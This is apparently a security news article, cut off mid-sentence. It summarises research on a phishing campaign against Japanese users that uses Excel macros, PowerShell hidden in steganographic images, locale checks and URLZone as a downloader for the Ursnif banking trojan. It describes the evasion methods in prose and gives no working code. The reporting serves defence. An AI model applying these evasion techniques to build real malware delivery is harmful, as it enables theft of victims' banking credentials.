Attack Combines Phishing, Steganography, PowerShell to Deliver Malware

URLZone Morphs Into a Downloader for Ursnif


Researchers have discovered a malware campaign targeting Japan and combining phishing, steganography, PowerShell, and the URLZone and Ursnif malwares.


The basic process described in a new report from Cybereason is a malspam campaign with a weaponized Excel document containing a PowerShell script that downloads steganographic images. The script extracts further Base64 and AES-encrypted and compressed PowerShell code from the images. This code subsequently downloads a stripped-down version of URLZone which is then used as a downloader for the Ursnif banking trojan.


The key elements of the campaign are that it is finely targeted against Japanese users, and that URLZone has been repurposed as an evasive downloader. The combination of PowerShell and steganography to deliver URLZone is an evasive technique to avoid detection.


The targeting comes first via the malspam campaign, and secondly through a series of location checks by the malware. The initial excel file uses a VBA macro to check the machine's country setting. If it is not 'Japan', the application closes; otherwise it proceeds. This script downloads, extracts and decodes more PowerShell code via a 600x600 pixel image. The extracted code then retrieves the initial payload, again steganographically hidden. The payload is extracted and decrypted -- and at this point a further geographic/language check is made. It uses the function (&Get-Culture).LCID to access the machine's language identifier and uses it as part of the decryption routine.


The initial payload is basically URLZone. URLZone, aka Bebloh and Shiotab, is a banking trojan that first appeared in 2009. It uses man-in-the-browser techniques and Windows API call-hooking to steal banking information. Its use against ..